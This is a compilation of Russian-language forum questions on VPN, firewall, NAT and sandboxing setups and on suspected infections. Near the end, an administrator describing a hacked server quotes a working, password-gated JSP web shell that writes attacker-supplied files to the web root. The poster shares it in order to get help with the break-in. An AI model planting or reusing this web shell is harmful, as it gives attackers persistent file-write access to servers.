Привет всем!

Столкнулся с багом или я дико туплю, сам понять уже не в состоянии, гуглил и решения не нашел.

Надо запихнуть ssh в firejail.
Система devuan_3, версия firejail 0.9.58.2 .
В /etc/firejail уже есть готовый профиль ssh.profile

При запуске firejail ssh user@host , firejail выдает ошибку "Couldn`t open /dev/null: Permission denied"

запустил firejail --profile=/etc/firejail/ssh.profile /bin/bash
посмотрел изнутри на /dev/null а у него права 0400!
-r--------
и это не символьный файл как должен быть а обычный.

попробовал указать в конфиге что должны быть права на запись

read-write /dev/null

права не поменялись, и записать в него нельзя, да и толку в обычный файл писать?

убрал из конфига private-dev , в результате все устройства стали доступны но права на /dev/null снова 0400 !!! и это снова обычный файл.

это баг или я что-то не так делаю?
это решается правкой конфига или надо свежую версию firejail качать?

Скрипты с:
setpriv ...
capsh ...
...
не предлагать!

Править исходники на C для сброса привилегий - не предлагать.

Сыстемды сервисы с cap - не предлагать.

Патчи Capability-NG от Google заманчивые, это то что в принципе подходит, но не предлагать. ;)

Хочу чисто существующими xattr file capability права на файл установить так, чтобы root его запускал и процесс имел пониженные привилегии.

setcap ...

Просмотреть привилегии можно например в pscap.

Настроил ikev2 сервер по двум инструкциям
https://vc.ru/dev/66942-sozdaem-svoy-vpn-server-poshagovaya-...
https://habr.com/ru/company/ruvds/blog/498924/
Сперва по первой, потом по второй с переустановкой системы.
Хостинг RUVDS
Не могу подключиться с двух устройств, которые находятся в одной и той же сети.
Поведение следующее:
Роутер TP-link archer AX50
К роутеру по WIFI подключено несколько устройств
1. Подключаю впн на одном из девайсов. Подключается и работает.
2. Подключаю впн с той же настройкой на втором устройстве. Подключение прошло. IP адрес выделен. Интернета нет. Со стороны сервера выданный IP адрес не пингуется.
Это ограничение? Или нужно настроить как-то роутер или сервер?

Добрый день!
Столкнулся с проблемой.
На VDS поднят strongswan + freeradius.
Авторизация проходит, но radius атрибуты не срабатывают для статического IP.

/etc/freeradius/3.0/users
%radius-username%   Cleartext-Password := "%radius-password%"
        NAS-Port-Type = Virtual,
        Service-Type = Framed-User,
        Framed-IP-Address = 10.255.24.12,
        Framed-IP-Netmask = 255.255.255.0,
        MS-Primary-DNS-Server = 8.8.8.8

В запросе четко видны радиус атрибуты, но они не срабатывают (радиус их получает, и игнорирует их)

Кусок дебага:
Sent Access-Accept Id 106 from 127.0.0.1:1812 to 127.0.0.1:34540 length 0
(4)   NAS-Port-Type = Virtual
(4)   Service-Type = Framed-User
(4)   Framed-IP-Address = 10.255.24.12
(4)   Framed-IP-Netmask = 255.255.255.0
(4)   MS-Primary-DNS-Server = 8.8.8.8
(4)   MS-MPPE-Encryption-Policy = Encryption-Allowed
(4)   MS-MPPE-Encryption-Types = RC4-40or128-bit-Allowed
(4)   MS-MPPE-Send-Key = 0x7bbb8b987de7d0dfc120c24433fb2083
(4)   MS-MPPE-Recv-Key = 0x1a461ae69b7751cd95e3d095a325571a
(4)   EAP-Message = 0x03030004
(4)   Message-Authenticator = 0x00000000000000000000000000000000
(4)   User-Name = "%radius-username%"
(4) Finished request
Waking up in 4.7 seconds.
(5) Received Accounting-Request Id 107 from 127.0.0.1:40811 to 127.0.0.1:1813 length 147
(5)   Acct-Status-Type = Start
(5)   Acct-Session-Id = "1647688010-64"
(5)   NAS-Port-Type = Virtual
(5)   Service-Type = Framed-User
(5)   NAS-Port = 64
(5)   NAS-Port-Id = "IKEv2+EAP"
(5)   NAS-IP-Address = %EXT-IP-VDS%
(5)   Called-Station-Id = "%EXT-IP-VDS%[500]"
(5)   Calling-Station-Id = "%EXT-IP-CLIENT%[500]"
(5)   User-Name = "%radius-username%"
(5)   Framed-IP-Address = 10.255.24.2
(5)   NAS-Identifier = "strongSwan"

IP адреса, логины и пароли изменены.

Буду рад совету.
Заранее благодарен.

Со вчерашнего дня на почтовом сервере наблюдаю сбой работы антивируса (ClamAV). Логи показывают, что причина заключается в невозможности скачать базы из-за сетевой недоступности ресурса, в результате чего Freshclam спустя несколько неудачных попыток выгружается. Если проверять https://www.clamav.net с браузера, то получаю ошибку "Аксес Денайд". С рабочего и домашнего провайдера бан воспроизводится, через прокси все работает, с мобильного интернета (МТС) тоже работает.
Как я понимаю, КламАВ врубил региональный бан? Есть какие-нибудь альтернативные репозитории с базами сигнатур?

Многие решения для резервного копирования виртуальных сред перестали обслуживать Россию, однако без резервного копирования виртуальных машин мне не обойтись.
Есть ли другое программное обеспечение для резервного копирования виртуальных машин?

Привет, хочу поделиться проблемой, уже давно меня беспокоящей.

Роутер Xiaomi 4C, имеются проблемы в падениях скорости (замерялось Speedtest'ом на нескольких устройствах)

Примеры падений:

https://ibb.co/2hZ4QML

https://ibb.co/bKf5Gfk

Т.е. скорость интернета в целом стабильная, но иногда, может каждые 5-10 секунд случается резкое падение скорости, и в целом выдает на 20-40% меньше нормы.

Предыстория: На предыдущем стареньком роутере TP-Link 2007 года была такая же проблема. Думал что дело в роутере - поменял его на новый, вместо 17-18МБит с падениями получил порядка 50-51 прямой линии без падений. Работал идеально порядка недели, потом все началось по новой.

Чем боролись: в основном локальными методами, вроде перезагрузки роутера, сбросом до заводских настроек, замены паролей сети и панели администратора с 8 до 20-значных,  отключения DHCP и переходом на статический IP адрес, отключения удаленного доступа и тд. Сброс до заводских настроек помогал на 1-2 дня, потом помогать перестало.

Решился на радикальный метод - вручную обновить прошивку до более высокой версии или наоборот - намеренно более низкой.

Перепрошивка роутера помогала значительно первое время, тоже порядка недели интернет был чистый с прямой линией на Speedtest'е, но потом снова возвращалось по новой. В итоге стал менять прошивку чуть ли не каждые 2-3 дня, чем конкретно подзадолбался, но в конечном итоге и эта мера перестала помогать.

На вопрос - "А может у тебя вирусы на компе и тд", ради этого даже специально переставлял виндоус чтобы проверить, затем проверял Speedtest'ом на компе и даже телефоне, буквально через минуту сразу после обновления прошивки - результат идентичен.

В итоге наблюдаем проблему - заражен скорее всего именно роутер, каким именно образом он умудряется "заражаться" понятия не имею, читал там иногда статейки что мол из-за уязвимостей в роутерах можно залезть удаленно в прошивку роутера и делать там что вздумается стоит тебе побыть немного в сети - думаю не миф. Я даже не исключаю что зараженный роутер может использоваться там в ДДос атаках на какие нибудь компании и тд.

Но проблема то - как с ней бороться? Что делать в этой ситуации и тд.? Чуть ли не побитово разобрать прошивку роутера и что там твориться или буквально по каждому пакету проследить куда отправляются данные и найти источник и обидчиков - реально ли или звучит как бред? Или может какие-то довольно простые, но при этом действенные рекомендации как избавиться от этой проблемы?

Тут главный гвоздь в том что даже не знаешь по каким ключевым словам гуглить эту проблему и как начать ее решать - все сайты предлагают сделать очень простые шаги, которые до этого мной уже были сделаны, но со временем перестали помогать. Так что я пока в замешательстве что делать с этим, проблема беспокоит уже пару месяцев и закончились уже и терпение, и нервы.

изучал арч вики и вот не понимаю как сделать https://wiki.archlinux.org/title/Security_(%D0%A0&...)#%D0%9E%D1%82%D0%BA%D1%80%D1%8B%D1%82%D1%8B%D0%B5_%D0%BF%D0%BE%D1%80%D1%82%D1%8B

Там где написано что службу можно привязать к локалхост. Это как то через systemd делается?

Добрый день коллеги,

столкнулся с задачей которую никак не могу решить верно (с помощью одного роутера freebsd).

сеть состоит из 3-х хостов R0, R1, H1. Необходимо обеспечить доступность H1 по обоим ip адресам, пусть для простоты будет tcp 110, при этом строгое условие - H1 должен отправлять пакеты отправителю с того адреса на который получен запрос.

Схематично: https://c.radikal.ru/c33/2112/a8/c337fae01d2f.jpg

R0  (не изменяемая часть)
ip A.A.A.A/24
================================
R1 (em0) (alias делать запрещено)
ip A.A.A.A+1/24
gw A.A.A.A

R1 (em2)
ip A.A.A.A+2/24
gw A.A.A.A

R1 (em1)
ip B.B.B.B/24
=================================
H1 (em0)
ip B.B.B.B+1/24 alias0 ip B.B.B.B+2/24
gw B.B.B.B

Как видно классический PBR и NAT, эта задача решается fwd (next-hop, c подменой mac), давнешний конфиг для этого (nat отдельным демоном) :

ipfw add 1000 divert 8778 ip from B.B.B.B+1 to any
ipfw add 1100 divert 8668 ip from B.B.B.B+2 to any

ipfw add 3000 fwd A.A.A.A log ip from A.A.A.A+1 to any
ipfw add 3100 fwd A.A.A.A ip from A.A.A.A+2 to any

ipfw add 4000 divert 8778 ip from any to A.A.A.A+1
ipfw add 4100 divert 8668 ip from any to A.A.A.A+2

ipfw add 5000 allow ip from any to any

Данный конфиг работает отлично когда внешние шлюзы R1 разные, т.е. A.A.A.A и какой-нибудь С.С.С.С, но в задаче выше шлюз одинаковый (читай mac+ip). Отладка правил показывает, что ipfw корректно работает по правилам, но отправка пакета действием fwd идет по первому попавшемуся соответствию в таблице соответствия mac+ip. Т.е. в случае выше по default-gateway A.A.A.A через интерфейс em0. По em2 tcpdump показывает, что получает пакеты из вне, но отправка ответа идет через em0. При этом хост H1 доступен через em0.

Соответственно вопрос, как в данной задаче обеспечить доступность хоста H1 через оба адреса (интерфейса) и с использованием только одного роутера R1 на базе FreeBSD? Накиньте идей, кручусь возле net.fibs(setfib), но что-то никак.

P.S. повторюсь, неизменяемые условия: R0, настройки R1 в части адресов А.А.А.0/24.

Всем доброго времени суток!

Система Windows X. Проблема с заражением браузера.

Спецом не являюсь так что прошу заранее прощения за отсутствие сленга и "свободное плавание" в вопросе.
При изучении кода браузеров - эдж/хром/мозила обнаружил теги не присущие для сайтов прописаны в теге style, а также ссылки ведущие на всякие непонятные сайты.
при просмотре с других устройств таких паразитов не обнаруживается, потому считаю, что заражено именно моё устройство. Использование MBAM, Kaspersky, DRWeb и прочими не выявляет источник заразы.

Заранее благодарен.

https://www.ft.com/content/c78be2cf-a1a1-40b1-8ab7-904d7095e...

Телепортацией и галограммами меня не удивить, а вот что за новый такой tcp/ip предлагают и в чем его суть, я так понимаю что оно нацелено на танкистов сидящих за натом ? Или я чего-то не так понимаю. Никто не изучал вопрос ?

как там задать priority строку идентификации?

Всем привет! Запустил iftop и заметил возникающие странные домены в выводе:
affirm.777777.gko
loaves.555444.rtx
vinson.8221112222.uoo
Что это может быть?

Добрый день всем.
Прошу помощи в настройке ipf и natd.
есть такие настройки

FreeBSD GW01 9.3-RELEASE-p42 FreeBSD 9.3-RELEASE-p42

fwcmd="/sbin/ipfw -q add"
nat="/sbin/natd -f /etc/natd.conf"
intIf="em0" #локальная сеть
extIf="em1" #Внешний мир
extIP2="IP2"
intIP1="IP1"
intIP1="IPo1"

$nat -p 8666 log -s -m -redirect_port tcp $IPo1:7654 7654 -a $extIP2
$fwcmd 1746 divert 8666 log tcp from any to $extIP2 7654 in via $extIf
$fwcmd 1746 divert 8666 log tcp from $IPo1 7654 to any out via $extIf

суть какая. при коннекте из внешнего мира на $extIP2 на порт 7654 пробрасывает на $IPo1:7654.
С этим вроде бы хорошо. Но необходимо чтобы была подмена $extIP2 на адрес $intIf
и что то с этим никак. если в строке NAt заменить -а $extIP2 на -а $intIf то перестает все работать.
можно ли такое сделать?

tails в virtualbox не запустился с флешки виртуальной.
fatal: could not read from the boot medium. system halted.

Приветствую форумчане!
Прошу помощи в FreeBsd есть довольно много вопросов касательно Ipfw.
1. Нужно ли пересобрать ядро в FreeBSD 13 чтобы включить поддержку ipfw?
В 9 версии пересобрал  с такими параметрами:
# ipfw
options IPFIREWALL
options IPFIREWALL_NAT
options IPFIREWALL_VERBOSE
options IPFIREWALL_VERBOSE_LIMIT=10
options LIBALIAS
options DUMMYNET
options ROUTETABLES=2

Нужно ли сейчас так заморачиваться?

2. Верно ли я понимаю  при параметре options IPFIREWALL_NAT, Nat работает ядерно, а при options DIVERT работает  через демон Natd?

3. Нужно ли включать  в ядре options LIBALIAS при ядерном нате на FreeBsd 13?

4. Если у кого то  есть  пример правил  с сетью  DMZ скиньте пожалуйста не совсем понимаю  реализацию  в плане правил.
Спасибо.

Все привет! Помогите, пожалуйста, с профилем для AppArmor
Вот профиль:

# Last Modified: Mon May  3 21:05:19 2021
#include <tunables/global>

/usr/bin/FBReader flags=(complain) {
  #include <abstractions/base>
  #include <abstractions/fonts>
  #include <abstractions/gnome>
  #include <abstractions/openssl>
  #include <abstractions/private-files>
  #include <abstractions/private-files-strict>
  #include <abstractions/ssl_certs>
  #include <abstractions/user-tmp>

  deny network,
  deny network inet,
  deny network inet6,
  deny network raw,

  / r,
  /** r,
  /usr/bin/FBReader m,
  /usr/share/** k,
  owner /home/*/** rk,
  owner /home/*/.FBReader/** rw,
  owner /proc/*/cmdline r,

}

Выход в сеть по-прежнему работает

Добрый день. Пожалуйста, не кидайтесь тапками в нуба, ибо опыта работы в данной сфере 0. Нужна Ваша профессиональная помощь!

Дано: небольшой медицинский кабинет, несколько устройств, подключенных к сети:
1. Компьютер врача
2. Компьютер администратора
3. Телефон врача
4. Телефон администратора
5. Принтер wi/fi
6. Телевизор смарт-тв
7. Несколько камер наблюдения
Проблема: сеть защищена только паролем от вайфай, все устройства подключены к одной общедоступной сети. т.е к какой сети подключены вышеперчисленные устройства, к той же сети подключаются паиенты и сотрудники. В любой момент могут подключиться к принтеру и пустить печать бранных слов, или, чт еще хуже, получить доступ к файлам клиентов (информация, заключения и тд). Так же проблема состоит в сотрудниках,точнеее в социальных сетях (фейсбук/инстаграм), в которых они любят сидеть, очень часто в рабочее время с пациентами.
Так же в ближайшем будущем хотели бы организовать свой небольшой сервер для хранения медицинской документации (отказаться от облачных решений), необходимо еще думать об этом.

Собственно, вопрос - как защитить "корпоративные" устройства от взлома, заблокировать доступ к фейсбуку/инстаграму, при этом что бы была возможность организовать сервер?

Буду рад за любую помощь. Не прошу сделать за себя, прошу лишь объяснить как это все можно сделать? Заранее извиняюсь, что мог поместить вопрос не в тот раздел.

Приходил сисадмин и у нас опять ничего не работает. Да у него rwrwrw на башке :)
Кому знакомо?

Всем привет форумчане! Хочу посоветовать отличный каталог статей: https://codeby.net/threads/ehtichnyj-xaking-testirovanie-na-.../ , на тему этичного хакинга, в нем вы сможете найти много полезной информации, не только статьи на определенную тему, но и новости, а также переводы с других языков на тему пентестинга, думаю данная информация окажется полезной, особенно начинающим в области ИБ.

В один прекрасный день, в один прекрасный момент интернет отключился (частично вроде, так как подключаться к серваку в игре начал, но остальные сайты не открывал).

Когда вводил адрес какого-либо сайта - грузилось это:

https://i.imgur.com/1RJvzGU.jpg

ASUS Wireless Router RT-N11P

В подключениях была "Сеть 4", хотя раньше была "Неопознанная сеть":

https://i.imgur.com/GQnzSYz.jpg

Что это такое?

Провайдер ТТК. PPPoE.

Напрямую через кабель подключен, роутер не юзаю (никаких асусов у меня нет и не было).

Вроде бы простой вопрос, но на лоре затруднились с ответом.
Цитирую свой вопрос сюда:

Для того, чтобы ограничить доступ к серверу со всех IP-адресов, кроме одного,  добавляю в строку конфига /etc/ufw/user.rules

-A ufw-user-input -p tcp --dport 22  -j ACCEPT

параметр -s 85.85.85.85 и она стает такой:

-A ufw-user-input -p tcp --dport 22 -s 85.85.85.85 -j ACCEPT

Пока сервер пускает со всех адресов.
Но когда делаю полный ребут сервера, то ура! - пускает только с 85.85.85.85

Но полный ребут не совсем гут, лучше перезапустить только файрвол ufw,
и для этого у него вроде как предсмотрена команда reload, о которой ман говорит так:

    reload - перезагрузить файервол;

Хорошо, перезагружаю. Но вместо ожидаемого результата из конфига выбрасывается -s 85.85.85.85 и брюки снова превращаются в свой прежний вид:

-A ufw-user-input -p tcp --dport 22  -j ACCEPT

Для чего вообще тогда этот непонятный reload, что он на самом деле делает?

Я любитель скачивать кряки с интернета.... В первый раз так жутко не повезло. Бэкапов никаких нет...
Установил photoshop(заметил, что python установился, но не понял и забил). Вечером заметил, что страницы стали грузится дольше. Решил зайти в диспетчер задач, увидел там процесс с python и tor. Изучил всё это дело и похоже python анонимно, что то отправлял. Программу tor нашёл на гитхабе - tor ip changer (https://github.com/ianxtianxt/tor-ip-changer) в торе я не шарю и это мне никого значения не дало. По python - запускалась прога через планировщик заданий. Все проги скину на диск и отправлю отдельным сообщением.
Вирусню удалил, планировщик почистил,но хром выдал ошибку ERR_PROXY_CONNECTION_FAILED.
после по гайдам настройки прокси в стандарт перевёл, реестр почистил, автозагрузку тоже, переустанавливал несколько раз Chrome, но так он и не заработал. Другие бразузеры, после того как я в свойствах браузера сбросил к стандарту в вкладке дополнительно. Сколько я гуглил, ничего не нашёл. Подскажите пожалуйста, что ещё можно попробовать сделать, чтоб заработало?

1) hblock - https://github.com/hectorm/hblock

Не останавливает флеш-рекламу, при просмотре ютуба вылезает куча рекламы.

2) AdBlock на роутере - я не пользуюсь роутером (прямое соединение), поэтому этот способ для меня не подходит.

Есть еще какие-либо варианты?

Спасибо.

Помогите разобраться.

Реализован впн с аутентификацией через freeraвius 3, с хранением данных в mysql.

Ожидаю в таблице radacct атрибут Calling-Station-Id видеть ип адрес клиентской машины в сети интернет, но записываются данные "2.18". Подскажите, куда посмотреть в радиус или pptpd, чтобы понять почему ip адрес не передается в БД, как этот параметр передается с pptpd в radius. Как настроить запрос sql, чтобы брался именно ип адрес,а не непонятные данные "2.18"?

Спасибо!

Шлюз на Debian 7.11 (3.2.0-4-686-pae), iptables v1.4.14.

ip внешнего интерфейса: 1.1.1.1

ip внутреннего интерфейса: 192.168.1.1

Внутри локальной сети работает ftp-сервер, для которого нужно организовать доступ снаружи.

ip ftp-сервера во внутренней сети: 192.168.1.55

Порт ftp-сервера во внутренней сети: 51

Вывод lsmod | grep ftp

nf_nat_ftp             12420  0
nf_conntrack_ftp       12533  2 nf_nat_ftp
nf_nat                 17913  2 iptable_nat,nf_nat_ftp
nf_conntrack           43121  9 nf_conntrack_ipv4,nf_nat,iptable_nat,xt_conntrack,xt_state,nf_conntrack_ftp,nf_nat_ftp,xt_CT,nf_conntrack_netlink

Вот так не работает:

iptables -t raw -A PREROUTING --dst 1.1.1.1   -p tcp --dport 55555 -j CT --helper ftp
iptables -t nat -A PREROUTING -i ext --dst 1.1.1.1 -p tcp --dport 55555 -j DNAT --to-destination 192.168.1.55:51

Управляющее соединение открывается, но соединение для потока данных нет.
conntrack -E expect ничего не показывает.

Если переделать, чтобы порт ftp-сервер был стандартным (настройки ftp-сервера и настройки iptables), то все работает:

iptables -t nat -A PREROUTING -i ext --dst 1.1.1.1 -p tcp --dport 55555 -j DNAT --to-destination 192.168.1.55:21

Подскажите пожалуйста какие нужны настройки, чтобы сделать доступным ftp-сервер, работающий на нестандартном порту?

Я хочу соединить два облака по IPsec. Для этой цели созданы по две виртуальной машины в каждом с внешними IP-адресом. Сам IPsec настроил, пинги идут между двумя точками IPsec-машин если указывать внутренние адреса. Но не могу настроить маршрутизацию на другие виртуальные машины из той же подсети. Машина с IPsec находится в той же подсети, что и остальные. Сетевой адаптер один на каждой ВМ. Нужно ли добавлять ещё один для настройки маршрутизации? ОС Ubuntu 20.04, strongSwan версии U5.8.2, ставил командой apt-get install strongswan. В sysctl указал net.ipv4.ip_forward = 1, добавил маршрут 10.132.0.0/20 via 10.129.0.254 dev eth0, файерволл выключен. Конфиг ipsec.conf с одной стороны:

config setup
        charondebug="all"
        uniqueids=yes
conn test
        ikelifetime=600m
        keylife=180m
        rekeymargin=3m
        keyingtries=3
        keyexchange=ikev2
        mobike=no
        ike=aes256gcm16-sha512-modp4096
        esp=aes256gcm16-sha512-modp8192
        authby=psk
        left="10.129.0.254"
        leftid="1.2.3.4"
        leftsubnet=10.129.0.0/24
        leftauth=psk
        right="4.3.2.1"
        rightid="4.3.2.1"
        rightsubnet=10.132.0.0/20
        rightauth=psk
        type=tunnel
        auto=start
        dpdaction=restart
        closeaction=restart

С другой стороны аналогично. Помогите, пожалуйста, настроить маршрутизацию, чтобы подсети видели друг-друга.

Здравсвуйте!
Подскажите. Есть машина. На ней у меня есть локальный администратор. Могу ли я с правами лок адм одной машины назначить лок адм другой по сети??😓😓😞
Помогите плз

Зашел в консоль, а там 4 админа в аккаунтах, по каталогам полазил, есть новые файлы. Наружу админка закрыта, походу по уязвимостям хакнули. Нашел разные файлы, вот один из них
<%
    if("toe0Kq".equals(request.getParameter("pwd")))
    {
        String strCode=request.getParameter("code");
        String strFile=request.getParameter("file");
        if(strCode!=null&&strFile!=null)
        {
            java.io.InputStream in = new java.io.ByteArrayInputStream(strCode.getBytes());
            byte[] b = new byte[1024];
            java.io.ByteArrayOutputStream bs = new java.io.ByteArrayOutputStream();
            int a = -1;
            while ((a = in.read(b)) != -1)
            {
                bs.write(b, 0, a);
            }
            new java.io.FileOutputStream(application.getRealPath("/")+"/img/"+strFile).write(bs.toByteArray());
        }
        out.print("XkaGrVj9");
    }
%>

Посмотрите интервью Майклом Тэлэном по ссылке на ютубе:

https://youtu.be/VVcYBpFR58Y